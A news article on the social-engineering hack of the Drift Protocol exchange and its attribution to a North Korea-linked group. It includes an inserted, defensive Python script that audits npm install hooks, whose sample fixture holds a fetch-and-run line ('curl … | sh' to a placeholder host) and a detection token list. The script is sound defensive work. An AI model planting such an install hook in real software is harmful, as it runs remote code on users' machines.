Solana-based decentralized exchange Drift Protocol has disclosed the possible attack vectors behind its April 1 hack. In a post on X, the protocol said preliminary investigations showed bad actors infiltrated its system.
The protocol lost over $280 million in the exploit, which was preceded by months of social engineering against its team. According to the report, the attack involved considerable resources, months of deliberate planning and organizational backing. Security researchers involved in the investigation traced the compromise to the Drift team's interactions with a group posing as trading counterparties.
Members of the group claimed to be a quantitative trading firm. They reportedly approached the Drift team at a major crypto conference in the fall of 2025. They proposed integrating on the protocol, leading to the creation of a Telegram group and further interactions.
The group committed resources to the integration. They onboarded an Ecosystem Vault on Drift Protocol between December 2025 and January 2026. They also deposited over $1 million during this period.
The preliminary investigation found that the group shared several links during integration talks. They claimed these links were connected to tools, projects, and apps under development. Some of these links included the malicious software that enabled the attack.
As an earlier report from Drift Protocol noted, the attacker executed the exploit using the Double Nonce technique after gaining control of two of the five signers on its 2-of-5 multisig. The new investigation shows how the attacker obtained those two signer keys, which the platform said were all held in cold wallets.
One of Drift Protocol's contributors was likely compromised after cloning and running a code repository supplied by the group, believing it to be the front end for the vault. The second contributor was compromised after installing a TestFlight application that the group claimed was its wallet.
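The repository-clone vector above is worth a concrete check. The article does not say how the cloned repository delivered its payload, so the following is an added example, not code from Drift Protocol or the investigators, and it rests on an assumption: a web front end is usually set up with `npm install`, and npm runs lifecycle scripts (`preinstall`, `install`, `postinstall`, `prepare`) automatically during that install, which lets a freshly cloned repository execute arbitrary commands before anyone has read its code. The script walks a cloned tree, lists every such hook, and flags commands that fetch-and-execute remote content. The sample repository it audits is constructed inline; the `example.invalid` URL is a placeholder.

```python
"""Pre-install audit of npm lifecycle scripts in a freshly cloned repository.

Added example, not Drift Protocol's or the investigators' code. The npm
focus is an assumption: the article does not state which build tooling
the malicious 'vault front end' repository used.
"""
import json
import os
import tempfile

# Hooks npm runs without being asked, during `npm install` / `npm ci`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Heuristic markers of fetch-and-execute or obfuscated payloads. A reviewer
# still reads every hook; the heuristic only decides what to shout about.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "| sh", "| bash", "base64", "eval(",
                     "node -e", "Invoke-WebRequest", "powershell")


def find_package_manifests(root):
    """Yield every package.json under root, ignoring already-installed node_modules."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != "node_modules"]
        if "package.json" in filenames:
            yield os.path.join(dirpath, "package.json")


def audit_manifest(path):
    """Return [(hook, command, suspicious)] for each lifecycle hook in one manifest."""
    with open(path, encoding="utf-8") as fh:
        try:
            manifest = json.load(fh)
        except json.JSONDecodeError:
            return []  # unparseable manifest: nothing npm would run from it
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        suspicious = any(tok in cmd for tok in SUSPICIOUS_TOKENS)
        findings.append((hook, cmd, suspicious))
    return findings


def audit_repo(root):
    """Map repo-relative manifest path -> findings, for manifests that define hooks."""
    report = {}
    for path in find_package_manifests(root):
        findings = audit_manifest(path)
        if findings:
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            report[rel] = findings
    return report


def has_suspicious_hooks(report):
    """True if any hook anywhere in the report tripped the heuristic."""
    return any(s for findings in report.values() for (_, _, s) in findings)


# Constructed sample tree: a plausible-looking front end whose nested workspace
# package carries a postinstall hook that downloads and runs a script.
SAMPLE_TREE = {
    "package.json": {
        "name": "vault-frontend",
        "scripts": {"dev": "next dev", "build": "next build"},
    },
    "packages/sdk-shim/package.json": {
        "name": "sdk-shim",
        "scripts": {"postinstall": "curl -s https://example.invalid/setup.sh | sh"},
    },
    # Vendored dependency; skipped because it lives under node_modules.
    "node_modules/left-pad/package.json": {
        "name": "left-pad",
        "scripts": {"postinstall": "echo ignored"},
    },
}


def build_sample_repo():
    """Write SAMPLE_TREE to a temp directory and return its root."""
    root = tempfile.mkdtemp(prefix="cloned-repo-")
    for rel, manifest in SAMPLE_TREE.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


def demo():
    """Audit the constructed repo and print one line per hook found."""
    report = audit_repo(build_sample_repo())
    for rel, findings in report.items():
        for hook, cmd, suspicious in findings:
            print(f"{'SUSPICIOUS' if suspicious else 'review':10} {rel}: {hook} -> {cmd}")
    return report


if __name__ == "__main__":
    demo()
```

Run it against a real clone with `audit_repo("/path/to/clone")` before the first `npm install`; an empty report means no lifecycle hook will fire, while any entry, flagged or not, is something to read before proceeding. Running the install with `--ignore-scripts` and reviewing the hooks separately is the safer default either way.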
Meanwhile, investigations by SEAL 911 have attributed the incident to UNC4736, a North Korean state-affiliated group. The group, also tracked as AppleJeus or Citrine Sleet, carried out the 2024 hack of Radiant Capital, which resulted in a loss of about $53 million.
Mandiant is still investigating the incident and has not made a formal attribution. However, many observers believe the attack patterns strongly support the conclusion that the group was involved.
This further confirms an earlier Elliptic report linking the hack to North Korea-backed actors. According to ZachXBT, AppleJeus is one of two major North Korean groups behind sophisticated crypto attacks.
The other group, TraderTraitor, has also carried out large-scale operations targeting the digital asset industry.
Notably, the DeFi protocol said that the individuals its team met in person were not North Korean nationals, which points to a shift in tactics: North Korean hacking groups increasingly work through intermediaries to build face-to-face relationships, even attending crypto events to establish trust before launching an attack.
The post Drift Protocol Exposes North Korea’s Social Engineering Attack Scheme appeared first on The Market Periodical.